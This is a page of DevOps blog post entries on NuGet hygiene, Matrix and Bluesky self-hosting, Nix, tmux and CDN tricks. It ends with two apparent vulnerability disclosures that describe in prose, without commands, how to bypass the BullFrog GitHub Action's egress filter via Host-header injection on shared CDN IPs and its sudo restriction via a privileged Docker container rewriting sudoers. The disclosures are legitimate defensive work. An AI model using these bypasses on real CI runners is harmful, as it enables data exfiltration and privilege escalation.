Posts in Devops (20 found)
daniel.haxx.se 2 days ago

chicken nuget

Background: nuget.org is a Microsoft-owned and -operated service that lets users package software and upload it to nuget so that other users can download it. It is targeted at .NET developers but there is really no filter on what you can offer through their service. Three years ago I reported on how nuget was hosting and providing ancient, outdated and insecure curl packages. Random people download a curl tarball, build curl and then upload it to nuget, and nuget then offers those curl builds to the world – forever.

To properly celebrate the three year anniversary of that blog post, I went back to nuget.org, entered curl into the search bar and took a look at the results. I immediately found at least seven different packages where people were providing severely outdated curl versions. The most popular of those, rmt_curl, reports that it has been downloaded almost 100,000 times over the years and is still downloaded almost 1,000 times per week. It is still happening. The packages I reported three years ago are gone, but now there is a new set of equally bad ones. No lessons learned.

rmt_curl claims to provide curl 7.51.0, a version we shipped in November 2016. Right now it has 64 known vulnerabilities and we have done more than 9,000 documented bugfixes since then. No one in their right mind should ever download or use this version.

Conclusion: the state of nuget is just as sad now as it was three years ago, and this triggered another someone is wrong on the internet moment for me. I felt I should do my duty and tell them. Again. Surely they will act this time! Surely they think of the security of their users?

The entire nuget concept is set up and destined to end up like this: random users on the internet put something together, upload it to nuget and then the rest of the world downloads and uses those things – trusting that whatever the description says is accurate and well-meaning.
Maybe there are some additional security scans done in the background, but I don't see how anyone can know that the packages don't contain any backdoors, trojans or other nasty deliberate attacks. And whatever has been uploaded once seems to then be offered in perpetuity.

Like three years ago, I listed a bunch of severely outdated curl packages in my report. nuget says I can email them a report, but that just sent me a bounce back saying they don't accept email reports anymore. (Sigh, and yes I reported that as a separate issue.) I was instead pointed over to the generic Microsoft security reporting page where there is not even a drop-down selection for "nuget", so I picked ".NET" instead when I submitted my report.

Almost identically to three years ago, my report was closed in less than 48 hours. It's not a nuget problem, they say.

Thank you again for submitting this report to the Microsoft Security Response Center (MSRC). After careful investigation, this case has been assessed as not a vulnerability and does not meet Microsoft's bar for immediate servicing. None of these packages are Microsoft owned, you will need to reach out directly to the owners to get patched versions published. Developers are responsible for removing their own packages or updating the dependencies.

In other words: they don't think it's nuget's responsibility to keep the packages they host secure and safe for their users. I should instead report these things individually to every outdated package provider – who, if they cared, would have removed or updated these packages many years ago already. Also, that would imply a never-ending game of whack-a-mole for me, since people obviously keep doing this. I think I have better things to do in my life.
In the cases I reported, the packages seem to be of the kind that once had the attention and energy of someone who kept them up-to-date with the curl releases for a while, then stopped, and since then the packages on nuget have just collected dust and gone stale. Still, apparently users keep finding and downloading them, even if maybe not at terribly high numbers. Thousands of fooled users per week is thousands too many.

The uploading users are perfectly allowed to do this, legally, and nuget is perfectly allowed to host these packages as per the curl license. I don't have a definite answer to what exactly nuget should do to address this problem once and for all, but as long as they allow packages uploaded nine years ago to still get downloaded today, it seems they are asking for this. They help users get tricked into downloading and using insecure software, and they are indifferent to it. A rare few applications that were uploaded nine years ago might actually still be okay, but those are extremely rare exceptions.

The last time I reported this nuget problem, nothing happened on the issue until I tweeted about it. This time around, a well-known Microsoft developer (who shall remain nameless here) saw my Mastodon post about this topic when mirrored over to Bluesky and pushed for the case internally – but not even that helped. The nuget management thinks this is okay. If I were into puns I would probably call them chicken nuget for their unwillingness to fix this. Maybe closing their eyes and pretending the problem doesn't exist will make it go away?

Absolutely no one should use nuget.
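For anyone who wants to repeat the check, NuGet's v3 "flat container" index lists every version a package has ever published. A sketch that builds the real index URL and parses the documented response shape offline (the fetch itself is left out so the example stays self-contained; the sample data is invented):

```python
import json

# The NuGet v3 flat-container index for a package lists all published
# versions at: https://api.nuget.org/v3-flatcontainer/<id-lower>/index.json
def index_url(package_id: str) -> str:
    """Build the flat-container index URL (package IDs are lowercased)."""
    return f"https://api.nuget.org/v3-flatcontainer/{package_id.lower()}/index.json"

def latest_version(index_json: str) -> str:
    """Return the last (newest) entry of a flat-container index document."""
    return json.loads(index_json)["versions"][-1]

# Offline sample in the documented response shape; a stale package's
# version list simply stops years ago.
sample = '{"versions": ["7.50.0", "7.51.0"]}'
```

Pointing a live request at that URL for any of the packages mentioned above shows at a glance whether the version list ends in the distant past.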

0 views
iDiallo 4 days ago

The Server Older than my Kids!

This blog runs on two servers. One is the main PHP blog engine that handles the logic and the database, while the other serves all static files. Many years ago, an article I wrote reached the top position on both Hacker News and Reddit. My server couldn't handle the traffic. I literally had a terminal window open, monitoring the CPU and restarting the server every couple of minutes. But I learned a lot from it. The page receiving all the traffic had a total of 17 assets, so in addition to the database getting hammered, my server was spending most of its time serving images, CSS and JavaScript files. I decided to set up additional servers to act as a sort of CDN to spread the load. I added multiple servers around the world and used MaxMindDB to determine a user's location and serve files from the closest server. But it was overkill for a small blog like mine, and I quickly downgraded back to just one server for the application and one for static files. Ever since I set up this configuration, my server has never failed due to a traffic spike. In fact, in 2018, right after I upgraded the servers to Ubuntu 18.04, one of my articles went viral like nothing I had seen before. Millions of requests hammered my server. The machine handled the traffic just fine. It's been 7 years now. I've procrastinated long enough; an upgrade was long overdue. What kept me from upgrading to Ubuntu 24.04 LTS was that I had customized the server heavily over the years and never documented any of it. Provisioning a new server means setting up accounts, dealing with permissions, and transferring files. All of this should have been straightforward with a formal process. Instead, uploading blog post assets has been a very manual affair. I only partially completed the upload interface, so I've been using SFTP and SCP from time to time to upload files. It's only now that I've finally created a provisioning script for my asset server.
I mostly used AI to generate it, then used a configuration file to set values such as email, username, SSH keys, and so on. With the click of a button, and 30 minutes of waiting for DNS to update, I now have a brand new server running Ubuntu 24.04, serving my files via Nginx. Yes, next month Ubuntu 26.04 LTS comes out, and I can migrate to it by running the same script. I also built an interface for uploading content without relying on SFTP or SSH, which I'll be publishing on GitHub soon. It's been 7 years running this server. It's older than my kids. Somehow, I feel a pang of emotion thinking about turning it off. I'll do it tonight... But while I'm at it, I need to do something about the 9-year-old and 11-year-old servers that still run some crucial applications.
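The geo-routing described above — resolve the visitor's location with MaxMind, then pick the nearest mirror — boils down to a great-circle distance comparison. A minimal sketch (the mirror names and coordinates are invented for illustration):

```python
from math import radians, sin, cos, asin, sqrt

# Hypothetical mirror fleet; coordinates are approximate city locations.
MIRRORS = {
    "us-east": (40.7, -74.0),   # New York
    "eu-west": (48.9, 2.35),    # Paris
    "ap-south": (1.35, 103.8),  # Singapore
}

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(a))

def closest_mirror(user_lat, user_lon):
    """Pick the mirror nearest to the user's (GeoIP-resolved) coordinates."""
    return min(MIRRORS, key=lambda m: haversine_km(user_lat, user_lon, *MIRRORS[m]))
```

In practice the latitude/longitude would come from a MaxMind database lookup on the client IP; the selection step itself is this simple.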

0 views

Starting My Personal Matrix Homeserver

I initially explored Matrix several years ago. It seemed promising, yet about as active as your average IRC channel, and it lacked most features one would want in a chat platform. Since Discord's relatively recent announcement about age-verification, and their longer-standing problem of slowly boiling their users like frogs by paywalling more and more basic features, I have revisited alternatives to the platform. Of all the ones I've tried so far, Matrix is the most promising to me. It can be self-hosted; it is federated, so I can communicate with communities outside of my server; and moderation has improved significantly. There are also more features and better clients since I last checked on it, and clients are getting even more attention thanks to Discord expats. Because of these improvements, I would say it has reached a point where it fits my needs. I have also learned so much and can confidently handle hosting this sort of thing now. I have been socializing in some great spaces so far, starting with Matrix United (#matrixunited-space:matrix.org) and MatrixRooms.info. The Apple room is especially active and has a lot of nice people. I recently finished setting up my own server, called snowberry.social, with a home page at https://snowberry.social that has a guide on what Matrix is and the focus of my server. Registration is currently restricted out of respect for my own time and energy, 1 and I have a few friends on there who have been open to the idea of leaving Discord, or at least trying something else. Recently, I have been open to making a completely public space for like-minded people focused on making a better social life on the internet. Topics include hosting your own software and applications, blogging, RSS, federated platforms, gaming, and more. Despite (or maybe because?)
my server has been so stable and easy to manage so far, I am hesitant to allow registration on my server, but I am open to using federation for people to join this space. However, I am torn, since I know the majority of users join the general matrix.org server, further centralizing Matrix – not to mention that Matrix may introduce its own age-verification to comply with future laws(?). I can't say I have a solid decision as of the writing of this post, but I am open to discussion, and people I have talked to before can request a registration token from me to join my homeserver. Feel free to join my newly created space with any Matrix account at #community:snowberry.social. I should note that when using matrix.to or mobile clients, you may be prompted to make an account at matrix.org by default. If you want to use or register under a different homeserver, you have to change it to your preferred one. Why is it called "Snowberry Social"? I am a huge Skyrim/Elder Scrolls fan, and one of the alchemical ingredients is a snowberry. It's cute. Setting up the full-featured stack for Matrix seemed incredibly daunting at first. It still is, although much less so now that I have it already made. The guide I followed, and that I recommend to anyone, is the matrix-docker-ansible-deploy repo. Using an Ansible playbook, you can easily set up a server with optional configurations and services. From the GitHub page: This Ansible playbook is meant to help you run your own Matrix homeserver, along with the various services related to that. That is, it lets you join the Matrix network using your own user ID like @alice:example.com, all hosted on your own server (see prerequisites). We run all supported services in Docker containers (see the container images we use), which lets us have a predictable and up-to-date setup, across multiple supported distros (see prerequisites) and architectures (x86/amd64 being recommended).
Installation (upgrades) and some maintenance tasks are automated using Ansible (see our Ansible guide). If you are interested in pursuing this, I highly recommend reading and re-reading every instruction, or you might get horribly frustrated depending on your technical experience. Follow every little prerequisite, learn what in the world an Ansible playbook is, learn what DNS is, and maybe be ready to wipe your VPS/container/whatever after screwing things up. 2 Some things I ran into while trying this: which files to configure, SSH key permission issues, and ports being closed. This is why I went with a VPS instead of my usual hardware, since port forwarding is simple and easy. The playbook even starts a web server for you in order to serve files, which is needed for federation capabilities. I highly recommend checking it out and reading through everything you can do with it. What everyone wants to know: can I use it on a daily basis without ripping my hair out? Sure. If you're a disgruntled Discord user, know that Matrix is not Discord. The layout (depending on the client) and features are much more geared toward a WhatsApp, Facebook Messenger, or even Slack alternative. By default, it does not support custom emotes/stickers and does not have "servers" with "channels" in "categories" like the average Discord user prefers. However, you can have spaces with rooms in subspaces. Furthermore, the client you choose can greatly affect your experience. The official client, and the most user-friendly in my opinion, is Element/Element X. 3 It is available on the web, or as an app on iOS, Android, macOS, Linux, and Windows. It is developed and maintained by the same team who develop and maintain the Matrix protocol. Other options are shown in the comparison table below, and a few image showcases can be found under the same table on https://snowberry.social. If you like Discord, Cinny and Commet are great desktop options. I personally use Cinny on macOS, and FluffyChat on my iPhone.
They both support custom emotes/stickers, which my friends also value. No limits on custom emoji use like Discord's paywalls! Does FluffyChat's choice of gradients and color themes for their app drive me a little insane because it's ugly? Yes, lol. Give Matrix a spin on matrix.org and move to a different homeserver later if you prefer. Join my space and see if we can make a community that's federated, decentralized, and private. I had a lot of fun setting this up and I have a lot of fun talking to others using it! There are whole communities out there waiting for discussions to blossom. Subscribe via email or RSS. 1. Registration is token-based using matrix-registration-bot. This means that users can only register when given a randomly generated string of characters and entering it upon account creation. ↩ 2. You do have a VPS, right? (See also this Reddit discussion on why self-hosters use them.) ↩ 3. Element X is the newest version of Element. ↩
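For a sense of what configuring the playbook involves, it is driven by a per-host vars.yml in your inventory. A heavily abridged, illustrative sketch — the two keys below are the ones I'd expect from the repo's documented quick start, but check the project's docs before relying on any of this:

```yaml
# inventory/host_vars/matrix.example.com/vars.yml (illustrative values only)
matrix_domain: example.com
matrix_homeserver_implementation: synapse
# ...plus generated secrets and any optional services you enable,
# per the playbook's configuration guide.
```

Running the playbook against this inventory then builds and starts the whole containerized stack.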

0 views
daniel.haxx.se 4 days ago

Dependency tracking is hard

curl and libcurl are written in C. They are rather low-level components present in many software systems, and they are typically not part of any ecosystem at all. They're just a tool and a library. In lots of places on the web, when you mention an Open Source project you also get the option to mention which ecosystem it belongs to: npm, go, rust, python etc. There are easily at least a dozen well-known and large ecosystems. curl is not part of any of those. Recently there's been a push for PURLs (Package URLs), for example when describing your specific package in a CVE. A package URL only works when the component is part of an ecosystem. curl is not. We can't specify curl or libcurl using a PURL. SBOM generators and related scanners use package managers to generate lists of used components and their dependencies. This makes these tools quite frequently just miss and ignore libcurl. It's not listed by the package managers. It's just in there, ready to be used. Like magic. It is similarly hard for these tools to figure out that curl in turn also depends on and uses other libraries. At build-time you select which – but as we in the curl project primarily just ship tarballs with source code, we cannot tell anyone what dependencies their builds have. The additional libraries libcurl itself uses are all similarly outside of the standard ecosystems. Part of the explanation is also that libcurl and curl are often shipped bundled with the operating system, or are sometimes perceived to be part of the OS. Most graphs, SBOM tools and dependency trackers therefore stop at the binding or system that uses curl or libcurl, without including curl or libcurl themselves – the layer above, so to speak. This makes it hard to figure out exactly how many components and how much software depend on libcurl. A perfect way to illustrate the problem is to check GitHub and see how many among its many millions of repositories depend on curl.
After all, curl is installed in some thirty billion installations, so clearly it is used a lot. (Most of them being libcurl of course.) It lists one dependency for curl. Repositories that depend on curl/curl: one. Screenshot taken on March 9, 2026. What makes this even more amusing is that it looks like this single dependent repository (Pupibent/spire) lists curl as a dependency by mistake.
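The PURL limitation described above is visible in the format itself: a purl is pkg:type/namespace/name@version, so it presupposes an ecosystem "type". A toy builder (a hypothetical helper, not the official packageurl library) makes the point concrete — the spec does offer a catch-all "generic" type, but it carries no registry an SBOM scanner could resolve against, which is exactly the gap the post describes:

```python
def make_purl(pkg_type, name, version, namespace=None):
    """Build a Package URL string: pkg:type/namespace/name@version."""
    middle = f"{namespace}/{name}" if namespace else name
    return f"pkg:{pkg_type}/{middle}@{version}"

# An ecosystem package maps cleanly onto the format...
npm_purl = make_purl("npm", "left-pad", "1.3.0")    # pkg:npm/left-pad@1.3.0

# ...but a plain C library only fits the catch-all "generic" type,
# which no package manager can look up or resolve dependencies for.
curl_purl = make_purl("generic", "curl", "8.5.0")   # pkg:generic/curl@8.5.0
```

The "type" segment is what ties a purl to a resolvable registry; for a component outside every registry, the identifier exists but the tooling built on top of it has nothing to query.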

0 views
Farid Zakaria 1 week ago

Nix is a lie, and that’s ok

When Eelco Dolstra, father of Nix, descended from the mountain tops and enlightened us all, one of the main commandments for Nix was to eschew all uses of the Filesystem Hierarchy Standard (FHS). The FHS is the "find libraries and files by convention" dogma Nix abandons in the pursuit of purity. What if I told you that was a lie? 😑 Nix was explicitly designed to eliminate the standard FHS lookup paths to guarantee reproducibility. However, graphics drivers represent a hard boundary between user-space and kernel-space. The user-space graphics library must match the host OS's kernel module and the physical GPU. Nearly all derivations do not bundle these driver libraries because they have no way of predicting the hardware or host kernel the binary will run on. What about NixOS? Surely, we know what kernel and drivers we have there!? 🤔 Well, if we modified every derivation to include the correct driver, it would cause massive rebuilds for every user and make the NixOS cache effectively useless. To solve this, NixOS & Home Manager introduce an intentional impurity: a global, well-known path where derivations expect to find the graphics drivers. We've just re-introduced a convention path à la FHS. 🫠 Unfortunately, that leaves users who run Nix on other Linux distributions in a bad state, which is documented in issue#9415, open since 2015. If you try to install and run any Nix application that requires graphics, you'll be hit with exactly the kind of "library not found" error Nix was designed to thwart. There are a couple of workarounds for those of us who use Nix on alternate distributions: nixGL, a runtime script that injects the driver library, or manually hacking things together by creating the expected path yourself and symlinking in the drivers from the host. For those of us who cling to the beautiful purity of Nix, however, it feels like a sad but ultimately necessary trade-off. Thou shalt not use FHS, unless you really need to.

0 views

How to Host your Own Email Server

I recently started a new platform where I sell my books and courses, and on this website I needed to send account-related emails to my users for things such as email address verification and password reset requests. The reasonable option that is often suggested is to use a paid email service such as Mailgun or SendGrid. Sending emails on your own is, according to the Internet, too difficult. Because the prospect of adding yet another dependency on Big Tech is depressing, I decided to go against the general advice and roll my own email server. And sure, it wasn't trivial, but it wasn't all that hard either! Are you interested in hosting your own email server, like me? In this article I'll tell you how to go from nothing to being able to send emails that are accepted by all the big email players. My main concern is sending, but I will also cover the simple solution that I'm using to receive emails and replies.
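At its core, a transactional message like the verification mail described here is just a MIME message handed to an SMTP server. A minimal sketch using Python's standard library — the addresses, URL, and host are placeholders, and a local MTA (e.g. Postfix) is assumed to handle actual delivery:

```python
import smtplib
from email.message import EmailMessage

def build_verification_email(to_addr: str, token: str) -> EmailMessage:
    """Compose a plain-text account-verification message."""
    msg = EmailMessage()
    msg["From"] = "no-reply@example.com"
    msg["To"] = to_addr
    msg["Subject"] = "Verify your email address"
    msg.set_content(
        f"Click to verify your account:\n"
        f"https://example.com/verify?token={token}\n"
    )
    return msg

def send(msg: EmailMessage, host: str = "localhost", port: int = 25) -> None:
    """Hand the message to the local mail server for delivery."""
    with smtplib.SMTP(host, port) as smtp:
        smtp.send_message(msg)
```

Composing the message is the easy part; the bulk of the work the article covers — SPF, DKIM, reverse DNS, reputation — is what makes the big providers accept what this hands off.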

0 views
Karan Sharma 1 week ago

A Web Terminal for My Homelab with ttyd + tmux

I wanted a browser terminal that works from laptop, tablet, and phone without special client setup. The stack that works cleanly for this is ttyd + tmux. Two decisions matter most: ttyd handles terminal-over-websocket behavior well, and enforcing a single active client avoids cross-tab resize contention. The ttyd flags give a writable shell, match my existing Caddy upstream, allow one active client only (no resize fight club), run a real host shell from inside the container, and load the correct login environment and tmux config for persistent attach/re-attach. Caddy reverse proxies to ttyd with TLS via a Cloudflare DNS challenge; because ttyd uses WebSockets heavily, reverse proxy support for upgrades is essential. I tuned tmux for long-running agent sessions, not just manual shell use: the status line shows host, session, path, and time; the pane border shows the pane number and current command; and the active pane is clearly highlighted. Keybindings cover creating/attaching named sessions, creating and renaming windows, a session/window picker, and pane movement and resizing. Copying was a big pain point, so I added both workflows: browser-native copy (turn tmux mouse off, drag-select, use the browser copy shortcut, then turn tmux mouse back on) and tmux copy mode. On mobile, ttyd's top-left menu of special keys makes prefix navigation workable. This is tailnet-only behind Tailscale, with no public exposure. Still, the container runs a real, writable host shell, which is a strong trust boundary. If you expose anything like this publicly, add auth in front and treat it as high-risk infrastructure. The terminal is now boring in the best way: stable, predictable, and fast to reach from any device.
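The tmux status and pane settings described above could look roughly like this in a tmux.conf — an illustrative sketch using standard tmux options, not the author's actual configuration:

```
# Status line: host, session, current path, time
set -g status-right "#H | #S | #{pane_current_path} | %H:%M"

# Pane borders: show pane number and the command running in it
set -g pane-border-status top
set -g pane-border-format "#{pane_index} #{pane_current_command}"

# Make the active pane obvious
set -g pane-active-border-style "fg=green"
```

All of these are stock tmux options and format variables, so the same effect is reproducible without any plugins.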

0 views
David Bushell 1 week ago

Bunny.net shared storage zones

Whilst moving projects off Cloudflare and migrating to Bunny, I discovered a neat 'Bunny hack' to make life easier. I like to explicitly say "no" to AI bots using an AI-blocking robots.txt†. Updating this file across multiple websites is tedious. With Bunny it's possible to use a single file. † I'm no fool, I know the AI industry has a consent problem, but the principle matters. My solution was to create a new storage zone as a single source of truth. In the screenshot above I've uploaded my common file to its own storage zone. This zone doesn't need any "pull zone" (CDN) connected; the file doesn't need to be publicly accessible by itself here. With that ready, I next visited each pull zone that will share the file. Under "CDN > Edge rules" in the menu I added the following rule. I chose the action "Override Origin: Storage Zone" and selected the new shared zone. Under conditions I added a "Request URL" match for the file's path. Using a wildcard makes it easier to copy & paste. I tried dynamic variables but they don't work for conditions. I added an identical edge rule for all websites I want to share the file. Finally, I made sure the CDN cache was purged for those URLs. This technique is useful for other shared assets like a favicon, for example. Neat, right? One downside to this approach is vendor lock-in. If or when Bunny hops the shark and I migrate elsewhere, I must find a new solution. My use case is not critical to my websites' functioning, so it's fine if I forget. Thanks for reading! Follow me on Mastodon and Bluesky. Subscribe to my Blog and Notes or Combined feeds.
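The shared file itself is ordinary robots.txt syntax. A minimal AI-bot blocklist might look like this — the user-agent names are a small illustrative subset (GPTBot and CCBot are documented AI crawlers), not the author's full list:

```
# Disallow common AI crawlers (illustrative subset)
User-agent: GPTBot
Disallow: /

User-agent: CCBot
Disallow: /

# Everyone else: crawl normally
User-agent: *
Allow: /
```

Serving this one file from the shared storage zone means adding a newly announced crawler requires a single edit rather than one per site.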

0 views
devansh 1 week ago

Bypassing egress filtering in BullFrog GitHub Action using shared IP

This is the third vulnerability I'm disclosing in BullFrog, alongside Bypassing egress filtering in BullFrog GitHub Action and sudo restriction bypass in BullFrog GitHub Action. Unlike those two, which exploit specific implementation gaps, this one is a fundamental design flaw – the kind that doesn't have a quick patch because it stems from how the filtering is architected. BullFrog markets itself as a domain-based egress filter. You give it a list of domains you trust, switch the policy to block, and everything else should be denied. The operative word there is should. When a workflow step makes a DNS query, BullFrog intercepts the DNS response and checks the queried domain name against your allowlist. If the domain is allowed, BullFrog takes the resolved IP address from the DNS answer and adds it to a system-level firewall whitelist (nftables). From that point on, any traffic to that IP is permitted, with no further domain-level inspection. BullFrog operates at the network layer (Layer 3) and transport layer (Layer 4). It can see IP addresses and ports. It cannot see HTTP Host headers, TLS SNI values, or any application-layer content. That's a Layer 7 problem, and BullFrog doesn't go there. The modern internet is not a one-to-one mapping of domains to IP addresses. It never really was, but today the gap is dramatic: a single IP address on a CDN like Cloudflare or CloudFront can serve hundreds of thousands of distinct domains. BullFrog's model assumes an IP corresponds to one domain (or at least one trusted context). That assumption is wrong. Consider what gets whitelisted in a typical CI workflow: every entry resolves to infrastructure shared with thousands of other tenants. The moment BullFrog whitelists the IP for a registry, it has also implicitly whitelisted every other domain on that same Cloudflare edge node, including an attacker's domain pointing to the same IP.
Once an allowed domain is resolved and its IP is added to the nftables whitelist, an attacker can reach any other domain on that same IP. BullFrog never sees the Host header. The firewall sees a packet destined for a permitted IP and passes it through. The server on the other end sees the injected Host header and responds with content from an entirely different, supposedly blocked domain. The flaw lives at agent/agent.go#L285. Two problems in one function. First, the whitelist entry opens the IP without any application-layer binding: all traffic to that IP is permitted, not just traffic for the domain that triggered the rule. Second, the else-if branch means that even a DNS query for a blocked domain gets logged as "allowed" if its IP happens to already be in the whitelist. The policy has effectively already been bypassed before the HTTP connection is even made. This PoC uses a DigitalOcean droplet running Nginx with two virtual hosts on the same IP — one "good" (allowed by BullFrog policy), one "evil" (blocked). nip.io is used as a wildcard DNS service so no domain purchase is needed. SSH into your droplet and set up both virtual hosts. Both domains resolve to the same droplet IP. BullFrog will only be told to allow the "good" domain. The final step returns the "evil" content — served by the "evil" virtual host, through a connection BullFrog marked as allowed, to a domain BullFrog was explicitly told to block. The DigitalOcean + nip.io setup is a controlled stand-in for the real threat model, which is considerably worse. Consider what actually gets whitelisted in production CI workflows: an attacker doesn't need to compromise the legitimate service. They just need to host their C2 or exfiltration endpoint on the same CDN, and inject the right Host header. The filtering guarantee evaporates entirely for any target on shared infrastructure, which in practice means most of the internet.
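The Host-header trick is easy to demonstrate locally. This self-contained sketch (all host names invented) simulates a single shared IP serving two virtual hosts, then shows a client reaching the "blocked" one over a connection that any L3/L4 filter would consider allowed:

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# One listener standing in for a CDN edge node that serves two virtual
# hosts: "good.example" (allowlisted) and "evil.example" (blocked).
class VirtualHostHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0]
        body = {"good.example": b"legit content",
                "evil.example": b"attacker content"}.get(host, b"unknown host")
        self.send_response(200)
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

def fetch(ip, port, host_header):
    """Connect to the (whitelisted) IP, but name any virtual host we like
    in the Host header -- a Layer 3/4 filter never sees this field."""
    conn = http.client.HTTPConnection(ip, port)
    conn.request("GET", "/", headers={"Host": host_header})
    body = conn.getresponse().read()
    conn.close()
    return body

server = HTTPServer(("127.0.0.1", 0), VirtualHostHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()
ip, port = server.server_address

allowed = fetch(ip, port, "good.example")  # what the allowlist intended
bypass = fetch(ip, port, "evil.example")   # same IP, different virtual host
server.shutdown()
```

Both requests traverse the identical IP and port; only the application-layer Host header differs, which is precisely the field an nftables-based filter cannot inspect.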
What gets whitelisted in a typical CI workflow: a dependency registry behind the Cloudflare CDN, a static files resource on Azure CDN, and blog storage hosted on Google infrastructure. The bypass takes two steps: use the allowed domain's URL, so the connection goes to the already-whitelisted IP (no new DNS lookup, no new policy check), then inject a different Host header to tell the server which virtual host to serve. Real-world impact: your dependency registry resolves to Cloudflare, so an attacker with any domain on Cloudflare can receive requests from that runner once the registry IP is whitelisted; your static file reserve resolves to Azure CDN, so every GitHub Actions workflow that pulls artifacts whitelists a slice of Azure's IP space. Disclosure timeline: Discovery & Report: 28th November 2025. Vendor Contact: 28th November 2025. Vendor Response: none. Public Disclosure: 28th February 2026.

0 views
David Bushell 1 week ago

MOOving to a self-hosted Bluesky PDS

Bluesky is a “Twitter clone” that runs on the AT Protocol. I have to be honest, I’d struggle to explain how atproto works. I think it’s similar to Nostr but like, good? When atproto devs talk about The Atmosphere they sound like blockchain bros. The marketing needs consideration. Bluesky, however, is a lot of fun. Feels like early Twitter. Nobody cool uses Twitter anymore. It’s a cesspit of racists asking Gork to undress women. Mastodon and Bluesky are the social platforms I use. I’ve always been tempted to self-host my own Mastodon instance, but the requirements are steep. I use the omg.lol server instead. Self-hosting the Bluesky PDS is much less demanding. This is the host machine; I glued an NVMe onto the underside. All services run as Docker containers for easy security sandboxing. I say easy, but it took many painful years to master Docker. I have the Pi on a VLAN firewall because I’m extra paranoid. I set up my Bluesky PDS using the official Docker container. It’s configured with environment variables and has a single data volume mounted. I back up that volume to my NAS. I’ve put Caddy in front of the PDS container. Right now it just acts as a reverse proxy. This gives me flexibility later if I want to add access logs, rate limiting, or other plugins. The tunnel links Caddy to the outside world via Cloudflare to avoid exposing my home IP address. Booo! If you know a good European alternative please let me know! Cloudflare also adds an extra level of bot protection. The guides I followed suggest adding wildcard DNS for the tunnel. Cloudflare has shuffled the dashboard for the umpteenth time and I can’t figure out how. I think sub-domains are only used for user handles. I use a different custom domain for my handle, with a manual TXT record to verify. Allowing the PDS to send emails isn’t strictly necessary. It’s useful for password resets, and I think it’ll send a code if I migrate PDS again.
I went through the hassle of adding my PDS domain to Proton Mail and followed their SMTP guide, which shows how the PDS environment variables are formatted. It took me forever to figure out where the username and password went. PDS MOOver by Bailey Townsend is the tool that does the data migration. It takes your Bluesky password and probably sees your private key, so use at your own risk! I set up a new account to test it before I YOLO’d my main. MOOve successful! I still log in as before, but I now select “custom account provider” and enter my PDS domain. SkyTools has a tool that confirms it. Bluesky Debug can check handles are verified correctly. PDSls.dev is a neat atproto explorer. I cross-referenced the following guides for help: Notes on Self Hosting a Bluesky PDS Alongside Other Services; Self-host federated Bluesky instance (PDS) with CloudFlare Tunnel; Host a PDS via a Cloudflare Tunnel; and Self-hosting Bluesky PDS. Most of the Cloudflare stuff is outdated because Cloudflare rolls dice every month. Bluesky is still heavily centralised, but the atproto layer allows anyone to control their own data. I like doing that on principle. I don’t like maintenance, but I’ve heard that’s minimal for a PDS. Supposedly it’s possible to migrate back to Bluesky’s PDS if I get bored. I’m tempted to build something in The Atmosphere. Any ideas? Thanks for reading! Follow me on Mastodon and Bluesky. Subscribe to my Blog and Notes or Combined feeds.
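The Caddy-in-front-of-the-PDS setup described above can be as small as a one-block Caddyfile. A sketch — the pds upstream name and port 3000 are assumptions about the container setup, not details from the post:

```
pds.example.com {
    # Plain reverse proxy to the PDS container for now;
    # access logs or rate limiting can be layered in here later.
    reverse_proxy pds:3000
}
```

Because the Cloudflare tunnel terminates in front of Caddy, this block never needs to expose a port to the open internet.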

1 view
Tara's Website 1 week ago

Flight record about MinIO

I wanted to leave a small flight record for my future self about what happened to MinIO. By the time I reread this, it will be old news. That is fine. This is less about the timeline and more about what it reminded me about my own preferences. I recently wrote about a data-first view of systems, where programs are transient and data is the center of gravity.

0 views
./techtipsy 1 week ago

The cloud just stopped scaling

It has happened. The cloud just stopped scaling. Hetzner’s cloud, for now. At this rate, my home server will actually have to become production at work, and my gaming PC has to be converted to a server because it has a whopping 32 GB of RAM and 6 good CPU cores. With Forza Horizon 6 on the horizon , it is time for some difficult decisions… Shortly after publishing this post, AWS had a different type of issue with availability zones going down due to… Iranian missile strikes. I’ve wanted decentralized hosting to be more popular, but not like this.

0 views
devansh 2 weeks ago

sudo restriction bypass via Docker Group in BullFrog GitHub Action

Least privilege is one of those security principles that everyone agrees with and almost nobody fully implements. In the GitHub Actions context, it means your workflow steps should only have the access they actually need, and no more. Running arbitrary third-party actions or build scripts as a user with unrestricted sudo is a liability: one compromised dependency, one malicious action, and an attacker owns the runner. BullFrog , the egress-filtering agent for GitHub Actions I wrote about previously , ships a feature specifically to address this. Enable it and BullFrog removes sudo access for all subsequent steps in the job. Or so it claims. The option, when enabled, strips sudo privileges from the runner user for all steps that follow the BullFrog setup step. It's designed as a privilege reduction primitive: you harden the environment early in the job so that nothing downstream can accidentally (or intentionally) run as root. After the setup step, sudo should fail, and subsequent steps should be constrained to what the unprivileged user can do. BullFrog achieves this by modifying the sudoers configuration, essentially removing or neutering the runner user's sudo entry. This works at the policy level: the sudo binary is still there, but the rule that would grant elevation is gone. On GitHub-hosted Ubuntu runners, the runner user is already a member of the docker group. This means the runner user can spawn Docker containers without sudo; no privilege escalation is required to get Docker running. And Docker, when given privileged mode and a host filesystem mount, is essentially root with extra steps. A privileged container with a host mount can write anywhere on the host filesystem, including the sudoers configuration. The sudo restriction is applied at one layer; Docker punches straight through to the layer below it. The feature only removes the sudoers entry for the runner user.
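As a sketch of the mechanism: GitHub-hosted runners grant the runner user passwordless sudo through a sudoers rule roughly like the one below, and neutering that rule is what the feature does. The exact file path and rule text are assumptions, not taken from BullFrog's source.

```
# Illustrative passwordless-sudo grant for the CI runner user.
# Removing or commenting out this rule makes `sudo` fail for that user,
# even though the sudo binary itself remains on disk.
runner ALL=(ALL) NOPASSWD:ALL
```

Note that sudoers-level hardening says nothing about the Docker socket, which is the gap the rest of this post exploits.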
